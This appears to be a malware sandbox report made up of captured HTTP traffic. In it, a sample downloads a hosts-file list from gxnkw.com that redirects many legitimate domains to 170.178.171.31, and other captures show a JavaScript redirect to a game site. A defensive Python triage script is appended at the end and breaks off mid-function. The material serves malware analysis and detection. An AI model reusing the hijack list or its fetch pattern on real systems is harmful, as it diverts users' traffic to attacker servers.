class="wrapper">.<noscript>.<p class="nojs">....................................................................................</p>.</noscript>.
<<< skipped >>>
GET /jc/tongji.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 0
Content-Type: text/plain
Last-Modified: Mon, 17 Aug 2015 16:25:45 GMT
Accept-Ranges: bytes
ETag: "4c1ca75e9d9d01:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:36:41 GMT
HTTP/1.1 200 OK..Content-Length: 0..Content-Type: text/plain..Last-Modified: Mon, 17 Aug 2015 16:25:45 GMT..Accept-Ranges: bytes..ETag: "4c1ca75e9d9d01:22a0"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Thu, 19 Jan 2017 00:36:41 GMT......
GET /jc/tongji.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 0
Content-Type: text/plain
Last-Modified: Mon, 17 Aug 2015 16:25:45 GMT
Accept-Ranges: bytes
ETag: "4c1ca75e9d9d01:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:36:49 GMT
HTTP/1.1 200 OK..Content-Length: 0..Content-Type: text/plain..Last-Modified: Mon, 17 Aug 2015 16:25:45 GMT..Accept-Ranges: bytes..ETag: "4c1ca75e9d9d01:22a0"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Thu, 19 Jan 2017 00:36:49 GMT......
GET /jc/tongji.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 0
Content-Type: text/plain
Last-Modified: Mon, 17 Aug 2015 16:25:45 GMT
Accept-Ranges: bytes
ETag: "4c1ca75e9d9d01:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:36:58 GMT
HTTP/1.1 200 OK..Content-Length: 0..Content-Type: text/plain..Last-Modified: Mon, 17 Aug 2015 16:25:45 GMT..Accept-Ranges: bytes..ETag: "4c1ca75e9d9d01:22a0"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Thu, 19 Jan 2017 00:36:58 GMT......
GET /CRL/Omniroot2025.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Sat, 16 Nov 2013 06:15:02 GMT
If-None-Match: "200da-5b6-4eb453c33260e"
User-Agent: Microsoft-CryptoAPI/6.1
Host: cdp1.public-trust.com
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-pkcs7-crl
Date: Thu, 19 Jan 2017 00:40:59 GMT
Etag: "200c0-cba-54651a19dc944"
Last-Modified: Tue, 17 Jan 2017 22:15:01 GMT
Server: ECS (arn/45CB)
X-Cache: HIT
Content-Length: 3258
0...0......0...*.H........0Z1.0...U....IE1.0...U....Baltimore1.0...U....CyberTrust1"0 ..U....Baltimore CyberTrust Root..170117212826Z..170414212826Z0...0....'k...120111220757Z0....'k...120111220847Z0....'.C..130130174530Z0....'....130807173059Z0....'....140122185220Z0....'....140212185542Z0....'yr..150701184507Z0....'#...100303201301Z0....''q..100414175202Z0....'L...110224181251Z0....'Pn..110309142119Z0....'....100216203312Z0....'#...100303201213Z0....'3#..100908172555Z0....''n..101208175627Z0....''m..101208175749Z0....''p..101208175916Z0....'H...110114162156Z0#...'X>..110815145134Z0.0...U.......0#...'Z2..110818184101Z0.0...U.......0....'g...120111164333Z0....'g...120111164409Z0....'g...120111164519Z0....'....100216213519Z0....''s..100414175225Z0....''k..100414181839Z0....'3"..100908172705Z0....'3$..100908172728Z0....''o..101208175645Z0....''l..101208175727Z0....'H...110119195142Z0....'Nz..110302154045Z0....'c...111207220933Z0....'g...120111164445Z0....''r..100414175143Z0....'8...101012182723Z0....'e...120111163041Z0....'VJ..110714160903Z0....'s...130123162633Z0....'....130904190524Z0....'....131024214319Z0....'....140129172435Z0....'....140129172453Z0....'....131024214310Z0....'....131101204601Z0....'....140219171632Z0....'.^..140409155638Z0....'i...140709171930Z0....'/:..141119193302Z0....'J...150603184605Z0....'k...150603185020Z0....'k...150603185058Z0....'k...150603185131Z0....'k...120111220827Z0....'8...140716191203Z0....'....131219195909Z0....'....140219171545Z0....'k...151105070000Z0....'q...160126173
<<< skipped >>>
GET /jc/bjcguanjianzi.txt?WebShieldDRSessionVerify=YizhEArCBnQ1QwpILGI0 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
Connection: Keep-Alive
HTTP/1.1 302 Found
Server: Safedog/4.0.0
Location: /jc/bjcguanjianzi.txt
Content-Length: 0
Connection: Close
Content-Type: text/html
GET /jc/tongji.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 0
Content-Type: text/plain
Last-Modified: Mon, 17 Aug 2015 16:25:45 GMT
Accept-Ranges: bytes
ETag: "4c1ca75e9d9d01:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:37:39 GMT
HTTP/1.1 200 OK..Content-Length: 0..Content-Type: text/plain..Last-Modified: Mon, 17 Aug 2015 16:25:45 GMT..Accept-Ranges: bytes..ETag: "4c1ca75e9d9d01:22a0"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Thu, 19 Jan 2017 00:37:39 GMT..
GET / HTTP/1.1
Accept: text/html, application/xhtml xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.117my.cc
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 228
Content-Type: text/html
Content-Location: hXXp://VVV.117my.cc/index.html
Last-Modified: Mon, 15 Aug 2016 05:17:18 GMT
Accept-Ranges: bytes
ETag: "c85d104bb4f6d11:a7a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:39:59 GMT
..<html>..........117...................2............<script language="javascript"> .. <!-- .. setTimeout("goto()","1000");..function goto(){.. window.location.href = "hXXp://VVV.92117my.com/index1.htm";..}.. -->.. </script>HTTP/1.1 200 OK..Content-Length: 228..Content-Type: text/html..Content-Location: hXXp://VVV.117my.cc/index.html..Last-Modified: Mon, 15 Aug 2016 05:17:18 GMT..Accept-Ranges: bytes..ETag: "c85d104bb4f6d11:a7a"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Thu, 19 Jan 2017 00:39:59 GMT....<html>..........117...................2............<script language="javascript"> .. <!-- .. setTimeout("goto()","1000");..function goto(){.. window.location.href = "hXXp://VVV.92117my.com/index1.htm";..}.. -->.. </script>..
GET /index1.htm HTTP/1.1
Accept: text/html, application/xhtml xml, */*
Referer: hXXp://VVV.117my.cc/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.92117my.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 5219
Content-Type: text/html
Last-Modified: Thu, 12 Jan 2017 13:56:43 GMT
Accept-Ranges: bytes
ETag: "c8d99b5db6cd21:3fe"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:39:37 GMT
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />..<title>......117................................................</title>..<meta name="keywords" content="......sf,..................,117......" />..<meta name="description" content="117......sf..................................................................................................................................................." />..<style type="text/css">..body{color:#175095;padding:8px 0;background:#333;}..a{color:#175095;text-decoration:none;}..a:link{color:#175095;text-decoration:none;}..a:hover{color:#e00;text-decoration:none;}..*{padding:0;margin:0;font-size:14px;font-family:'Microsoft Yahei','Lucida Grande',Helvetica,Arial,sans-serif;}..#w{width:1002px;margin:0 auto;padding:8px;background:#fff;-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;-webkit-box-shadow:0 0 8px #000000;-moz-box-shadow:0 0 8px #000000;box-shadow:0 0 8px #000000;}..#logo{height:91px;background:url(logo.jpg) no-repeat;}..#d{margin-top:8px;}..#d table{border-spacing:1px;width:100%;background:#e3f3fe;border:1px solid #95bcd6;}..#d table tr:hover{background:#fff;}..#d td{padding:10px;line-height:15px;text-align:center;border:1px solid #95bcd6;overflow:hidden;white-space:nowrap;}..#k{margin-top:8px;border-top:1
<<< skipped >>>
GET /game.html HTTP/1.1
Accept: text/html, application/xhtml xml, */*
Referer: hXXp://VVV.92117my.com/index1.htm
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.92117my.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 17051
Content-Type: text/html
Last-Modified: Mon, 16 Jan 2017 11:52:03 GMT
Accept-Ranges: bytes
ETag: "cfaef4ee6fd21:3fe"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:39:38 GMT
<html>..<HEAD>..<title>117................</title>..<meta http-equiv="Content-Type" content="text/html; charset=gb2312">..<META NAME="keywords" CONTENT="117................">..<META NAME="description" CONTENT="117................">..<META NAME="robots" CONTENT="all">..<script type='text/javascript'>window.mod_pagespeed_start = Number(new Date());</script>..<link rel='stylesheet' href='images/xx.css' type='text/css'>..<script language=javascript src="images/new.js"></script>..<BODY leftMargin=0 topMargin=0>..<TABLE align='center' cellSpacing=0 cellPadding=0 width='100%' border=0>..<TR>..<TD>..<style type="text/css"> ..<!--..body{background:#2B0045 url(images/bg.jpg) no-repeat center 0;font-size:12px;}...about {...height: 38px;width: 310px;font-size: 14px;line-height: normal;font-weight: bolder;font-family: "....";position: absolute;.left: auto;top: 96px;text-align: left;}...logo{width:980px;height:120px;position:absolute;left:261px;top:23px;}...logo a{width:980px;height:120px;display:block;position:inherit;text-indent:-9999px;}.....-->...aboutqq {...height: 28px;width: 310px;font-size: 14px;line-height: normal;font-weight: bolder;font-family: "....";position: absolute;.left: auto;top: 76px;text-align: left;}...logo{width:980px;height:130px;position:absolute;left:201px;top:13px;}...logo a{width:980px;height:130px;display:block;position:inherit;text-indent:-9999px;}.. .. ...banner{width:984px;margin:0
<<< skipped >>>
GET /images/bg.jpg HTTP/1.1
Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://VVV.92117my.com/game.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.92117my.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 47783
Content-Type: image/jpeg
Last-Modified: Wed, 01 Jul 2015 07:57:44 GMT
Accept-Ranges: bytes
ETag: "08c919cd3b3d01:3fe"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:39:39 GMT
......Exif..II*.................Ducky.......F.....rhXXp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="http://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:1AB21EE2D186E011AF1EE9B4DAE6B957" xmpMM:DocumentID="xmp.did:8075A7ADFD1411E288C0AA50F7BC029F" xmpMM:InstanceID="xmp.iid:8075A7ACFD1411E288C0AA50F7BC029F" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:f3ed0250-4dae-e34c-bf8c-3468d4276f83" stRef:documentID="xmp.did:1AB21EE2D186E011AF1EE9B4DAE6B957"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.................................................................................................................................................................Z................................................................1aQ!A...............................?..Cj. @..... @..... 4...7...... .6.H.@....H. 7.)....V..H. .....U).).).)....R.B..@).)..P....E.AJ@)..P..JA.@).J@)....U[ ..S..<..?.....Jy..A..H.<.....@..).B.A......E).F..<.g..A...y..A..7..A..7...7.o .Eo ..o*7.o ...... ...s.*..*7.\... ....Ar..\....\....s.".. .A.....3.e../
<<< skipped >>>
GET /jc/tongji.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 0
Content-Type: text/plain
Last-Modified: Mon, 17 Aug 2015 16:25:45 GMT
Accept-Ranges: bytes
ETag: "4c1ca75e9d9d01:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:36:41 GMT
HTTP/1.1 200 OK..Content-Length: 0..Content-Type: text/plain..Last-Modified: Mon, 17 Aug 2015 16:25:45 GMT..Accept-Ranges: bytes..ETag: "4c1ca75e9d9d01:22a0"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Thu, 19 Jan 2017 00:36:41 GMT......
GET /jc/hostjc.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 5537
Content-Type: text/plain
Last-Modified: Thu, 05 Jan 2017 14:07:24 GMT
Accept-Ranges: bytes
ETag: "b05a1ba5d67d21:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:36:46 GMT
170.178.171.31 VVV.176cc.cc..170.178.171.31 VVV.52my.com..170.178.171.31 VVV.crsky.com..170.178.171.31 crsky.com..170.178.171.31 VVV.901my.com..170.178.171.31 901my.com..170.178.171.31 moyu.so..170.178.171.31 kkk.dstfkj.com.cn..170.178.171.31 dstfkj.com.cn..170.178.171.31 VVV.214my.com..170.178.171.31 VVV.h360k.com..170.178.171.31 h360k.com..170.178.171.31 rsivy.pw..170.178.171.31 214my.com..170.178.171.31 VVV.270my.com..170.178.171.31 360.chihuo0517.com..170.178.171.31 chihuo0517.com..170.178.171.31 270my.com..170.178.171.31 VVV.moyu.so..170.178.171.31 VVV.hwkam.com..170.178.171.31 178stu.com..170.178.171.31 VVV.178stu.com..170.178.171.31 hwkam.com..170.178.171.31 VVV.5917wan.com..170.178.171.31 VVV.delifs.com..170.178.171.31 delifs.com..170.178.171.31 VVV.11moyu.com..170.178.171.31 t2.web.tonnn.com..170.178.171.31 VVV.2828my.com..170.178.171.31 2828my.com..170.178.171.31 tonnn.com..170.178.171.31 VVV.11my.net..170.178.171.31 VVV.91my.com..170.178.171.31 91my.com..170.178.171.31 wg.91my.com..170.178.171.31 my.178stu.com..170.178.171.31 134my.com..170.178.171.31 VVV.134my.com..170.178.171.31 001my.com..170.178.171.31 VVV.910my.com..170.178.171.31 910my.com..170.178.171.31 VVV.901my.com..170.178.171.31 901my.com..170.178.171.31 VVV.6moyu.com..170.178.171.31 110moyu.com..170.178.171.31 VVV.110moyu.com..170.178.171.31 dl.pconline.com.cn..170.178.171.31 VVV.moyushou.com..170.178.171.31 pconline.com.cn..170.178.171.31 VVV.52z.com..170.178.171.31 wanba.baidu.com..170.178.171.31 VVV.99sfmy.com..170.178.171.31 VVV.myco
<<< skipped >>>
GET /jc/hostjc.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 5537
Content-Type: text/plain
Last-Modified: Thu, 05 Jan 2017 14:07:24 GMT
Accept-Ranges: bytes
ETag: "b05a1ba5d67d21:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:36:58 GMT
170.178.171.31 VVV.176cc.cc..170.178.171.31 VVV.52my.com..170.178.171.31 VVV.crsky.com..170.178.171.31 crsky.com..170.178.171.31 VVV.901my.com..170.178.171.31 901my.com..170.178.171.31 moyu.so..170.178.171.31 kkk.dstfkj.com.cn..170.178.171.31 dstfkj.com.cn..170.178.171.31 VVV.214my.com..170.178.171.31 VVV.h360k.com..170.178.171.31 h360k.com..170.178.171.31 rsivy.pw..170.178.171.31 214my.com..170.178.171.31 VVV.270my.com..170.178.171.31 360.chihuo0517.com..170.178.171.31 chihuo0517.com..170.178.171.31 270my.com..170.178.171.31 VVV.moyu.so..170.178.171.31 VVV.hwkam.com..170.178.171.31 178stu.com..170.178.171.31 VVV.178stu.com..170.178.171.31 hwkam.com..170.178.171.31 VVV.5917wan.com..170.178.171.31 VVV.delifs.com..170.178.171.31 delifs.com..170.178.171.31 VVV.11moyu.com..170.178.171.31 t2.web.tonnn.com..170.178.171.31 VVV.2828my.com..170.178.171.31 2828my.com..170.178.171.31 tonnn.com..170.178.171.31 VVV.11my.net..170.178.171.31 VVV.91my.com..170.178.171.31 91my.com..170.178.171.31 wg.91my.com..170.178.171.31 my.178stu.com..170.178.171.31 134my.com..170.178.171.31 VVV.134my.com..170.178.171.31 001my.com..170.178.171.31 VVV.910my.com..170.178.171.31 910my.com..170.178.171.31 VVV.901my.com..170VVV.518ak.com..170.178.171.31 lpput.com..170.178.171.31 hjmyh.com..170.178.171.31 VVV.5555my.com..170.178.171.31 aaa.5555my.com..170.178.171.31 VVV.hjmyh.com..170.178.171.31 VVV.195my.com..170.178.171.31 195my.com..170.178.171.31 VVV.195sy.com..170.178.171.31 195sy.com..170.178.171.31 spxwj.com..170.178.171.31 817zs.cn..170.1
<<< skipped >>>
GET /jc/hostjc.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 5537
Content-Type: text/plain
Last-Modified: Thu, 05 Jan 2017 14:07:24 GMT
Accept-Ranges: bytes
ETag: "b05a1ba5d67d21:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:36:58 GMT
170.178.171.31 VVV.176cc.cc..170.178.171.31 VVV.52my.com..170.178.171.31 VVV.crsky.com..170.178.171.31 crsky.com..170.178.171.31 VVV.901my.com..170.178.171.31 901my.com..170.178.171.31 moyu.so..170.178.171.31 kkk.dstfkj.com.cn..170.178.171.31 dstfkj.com.cn..170.178.171.31 VVV.214my.com..170.178.171.31 VVV.h360k.com..170.178.171.31 h360k.com..170.178.171.31 rsivy.pw..170.178.171.31 214my.com..170.178.171.31 VVV.270my.com..170.178.171.31 360.chihuo0517.com..170.178.171.31 chihuo0517.com..170.178.171.31 270my.com..170.178.171.31 VVV.moyu.so..170.178.171.31 VVV.hwkam.com..170.178.171.31 178stu.com..170.178.171.31 VVV.178stu.com..170.178.171.31 hwkam.com..170.178.171.31 VVV.5917wan.com..170.178.171.31 VVV.delifs.com..170.178.171.31 delifs.com..170.178.171.31 VVV.11moyu.com..170.178.171.31 t2.web.tonnn.com..170.178.171.31 VVV.2828my.com..170.178.171.31 2828my.com..170.178.171.31 tonnn.com..170.178.171.31 VVV.11my.net..170.178.171.31 VVV.91my.com..170.178.171.31 91my.com..170.178.171.31 wg.91my.com..170.178.171.31 my.178stu.com..170.178.171.31 134my.com..170.178.171.31 VVV.134my.com..170.178.171.31 001my.com..170.178.171.31 VVV.910my.com..170.178.171.31 910my.com..170.178.171.31 VVV.901my.com..170.178.171.31 901my.com..170.178.171.31 VVV.6moyu.com..170.178.171.31 110moyu.com..170.178.171.31 VVV.110moyu.com..170.178.171.31 dl.pconline.com.cn..170.178.171.31 VVV.moyushou.com..170.178.171.31 pconline.com.cn..170.178.171.31 VVV.52z.com..170.178.171.31 wanba.baidu.com..170.178.171.31 VVV.99sfmy.com..170.178.171.31 VVV.myco
<<< skipped >>>
GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: VVV.117my.cc
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Content-Length: 1308
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:39:59 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.org/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>............</TITLE>..<META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312">..<STYLE type="text/css">.. BODY { font: 9pt/12pt .... }.. H1 { font: 12pt/15pt .... }.. H2 { font: 9pt/12pt .... }.. A:link { color: red }.. A:visited { color: maroon }..</STYLE>..</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>..<h1>............</h1>....................................................<hr>..<p>................</p>..<ul>..<li>........................................................</li>..<li>..................................................................................</li>..<li>....<a href="javascript:history.back(1)">....</a>....................</li>..</ul>..<h2>HTTP .... 404 - ..................<br>Internet ........ (IIS)</h2>..<hr>..<p>..............................</p>..<ul>..<li>.... <a href="hXXp://go.microsoft.com/fwlink/?linkid=8180">Microsoft ............</a>..........“HTTP”..“404”........</li>..<li>....“IIS ....”...... IIS ...... (inetmgr) ........................“........”..“............”..“..................”........</li>..</ul>..</TD><
<<< skipped >>>
GET /jc/hostjc.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 5537
Content-Type: text/plain
Last-Modified: Thu, 05 Jan 2017 14:07:24 GMT
Accept-Ranges: bytes
ETag: "b05a1ba5d67d21:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:37:32 GMT
170.178.171.31 VVV.176cc.cc..170.178.171.31 VVV.52my.com..170.178.171.31 VVV.crsky.com..170.178.171.31 crsky.com..170.178.171.31 VVV.901my.com..170.178.171.31 901my.com..170.178.171.31 moyu.so..170.178.171.31 kkk.dstfkj.com.cn..170.178.171.31 dstfkj.com.cn..170.178.171.31 VVV.214my.com..170.178.171.31 VVV.h360k.com..170.178.171.31 h360k.com..170.178.171.31 rsivy.pw..170.178.171.31 214my.com..170.178.171.31 VVV.270my.com..170.178.171.31 360.chihuo0517.com..170.178.171.31 chihuo0517.com..170.178.171.31 270my.com..170.178.171.31 VVV.moyu.so..170.178.171.31 VVV.hwkam.com..170.178.171.31 178stu.com..170.178.171.31 VVV.178stu.com..170.178.171.31 hwkam.com..170.178.171.31 VVV.5917wan.com..170.178.171.31 VVV.delifs.com..170.178.171.31 delifs.com..170.178.171.31 VVV.11moyu.com..170.178.171.31 t2.web.tonnn.com..170.178.171.31 VVV.2828my.com..170.178.171.31 2828my.com..170.178.171.31 tonnn.com..170.178.171.31 VVV.11my.net..170.178.171.31 VVV.91my.com..170.178.171.31 91my.com..170.178.171.31 wg.91my.com..170.178.171.31 my.178stu.com..170.178.171.31 134my.com..170.178.171.31 VVV.134my.com..170.178.171.31 001my.com..170.178.171.31 VVV.910my.com..170.178.171.31 910my.com..170.178.171.31 VVV.901my.com..170.178.171.31 901my.com..170.178.171.31 VVV.6moyu.com..170.178.171.31 110moyu.com..170.178.171.31 VVV.110moyu.com..170.178.171.31 dl.pconline.com.cn..170.178.171.31 VVV.moyushou.com..170.178.171.31 pconline.com.cn..170.178.171.31 VVV.52z.com..170.178.171.31 wanba.baidu.com..170.178.171.31 VVV.99sfmy.com..170.178.171.31 VVV.myco
<<< skipped >>>
GET /jc/hostjc.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 5537
Content-Type: text/plain
Last-Modified: Thu, 05 Jan 2017 14:07:24 GMT
Accept-Ranges: bytes
ETag: "b05a1ba5d67d21:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:37:33 GMT
170.178.171.31 VVV.176cc.cc..170.178.171.31 VVV.52my.com..170.178.171.31 VVV.crsky.com..170.178.171.31 crsky.com..170.178.171.31 VVV.901my.com..170.178.171.31 901my.com..170.178.171.31 moyu.so..170.178.171.31 kkk.dstfkj.com.cn..170.178.171.31 dstfkj.com.cn..170.178.171.31 VVV.214my.com..170.178.171.31 VVV.h360k.com..170.178.171.31 h360k.com..170.178.171.31 rsivy.pw..170.178.171.31 214my.com..170.178.171.31 VVV.270my.com..170.178.171.31 360.chihuo0517.com..170.178.171.31 chihuo0517.com..170.178.171.31 270my.com..170.178.171.31 VVV.moyu.so..170.178.171.31 VVV.hwkam.com..170.178.171.31 178stu.com..170.178.171.31 VVV.178stu.com..170.178.171.31 hwkam.com..170.178.171.31 VVV.5917wan.com..170.178.171.31 VVV.delifs.com..170.178.171.31 delifs.com..170.178.171.31 VVV.11moyu.com..170.178.171.31 t2.web.tonnn.com..170.178.171.31 VVV.2828my.com..170.178.171.31 2828my.com..170.178.171.31 tonnn.com..170.178.171.31 VVV.11my.net..170.178.171.31 VVV.91my.com..170.178.171.31 91my.com..170.178.171.31 wg.91my.com..170.178.171.31 my.178stu.com..170.178.171.31 134my.com..170.178.171.31 VVV.134my.com..170.178.171.31 001my.com..170.178.171.31 VVV.910my.com..170.178.171.31 910my.com..170.178.171.31 VVV.901my.com..170.178.171.31 901my.com..170.178.171.31 VVV.6moyu.com..170.178.171.31 110moyu.com..170.178.171.31 VVV.110moyu.com..170.178.171.31 dl.pconline.com.cn..170.178.171.31 VVV.moyushou.com..170.178.171.31 pconline.com.cn..170.178.171.31 VVV.52z.com..170.178.171.31 wanba.baidu.com..170.178.171.31 VVV.99sfmy.com..170.178.171.31 VVV.myco
<<< skipped >>>
GET /jc/hostjc.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 5537
Content-Type: text/plain
Last-Modified: Thu, 05 Jan 2017 14:07:24 GMT
Accept-Ranges: bytes
ETag: "b05a1ba5d67d21:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:37:37 GMT
(response body: the same 5537-byte hosts list as returned above, not repeated)
<<< skipped >>>
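The body returned for /jc/hostjc.txt is a hosts-file list: every line maps a domain to 170.178.171.31, and the strings dumped from svchost.exe later in this report reference %System%\drivers\etc\hosts. The Python below is an added triage example and is not part of the report or of the sample. It parses such a payload, accepting the report's own rendering (each CR LF between entries printed as "..") as well as real line endings, and then flags any non-loopback IP that claims many distinct registrable domains, which is the signature of a redirect sinkhole rather than an ad-blocking hosts file. Assumptions: VVV in the report stands for www; the second-level suffix list is a short stand-in for the Public Suffix List; the sample input is constructed from a few of the captured entries plus one benign loopback line.

```python
"""Parse a hosts-file payload like the one served from /jc/hostjc.txt and flag
redirect sinkholes: a single non-loopback IP that claims many unrelated domains."""
import ipaddress
import re
from collections import defaultdict

# Suffixes under which the registrable domain is one label deeper
# ("pconline.com.cn", not "com.cn"). A short assumed list; a production
# tool would use the Public Suffix List.
SECOND_LEVEL_SUFFIXES = {"com.cn", "net.cn", "org.cn", "gov.cn", "co.uk", "co.jp"}


def registrable_domain(host):
    """Registrable domain of a host name, e.g. dl.pconline.com.cn -> pconline.com.cn."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in SECOND_LEVEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def parse_hosts_payload(text):
    """Return (ip, hostname) pairs from hosts-file text.

    Accepts real line endings as well as the report's rendering, in which every
    CR LF between entries was printed as '..' (host names never contain '..')."""
    text = text.replace("..", "\n")
    pairs = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()          # hosts files allow '#' comments
        fields = line.split()
        if not fields:
            continue
        try:
            ip = str(ipaddress.ip_address(fields[0]))
        except ValueError:
            continue                                   # not an "IP host ..." line
        for host in fields[1:]:
            if re.fullmatch(r"[A-Za-z0-9.-]+", host):
                pairs.append((ip, host.lower()))
    return pairs


def find_sinkholes(pairs, min_domains=5):
    """Group by IP and return {ip: sorted registrable domains} for every
    non-loopback IP that claims at least min_domains distinct domains.
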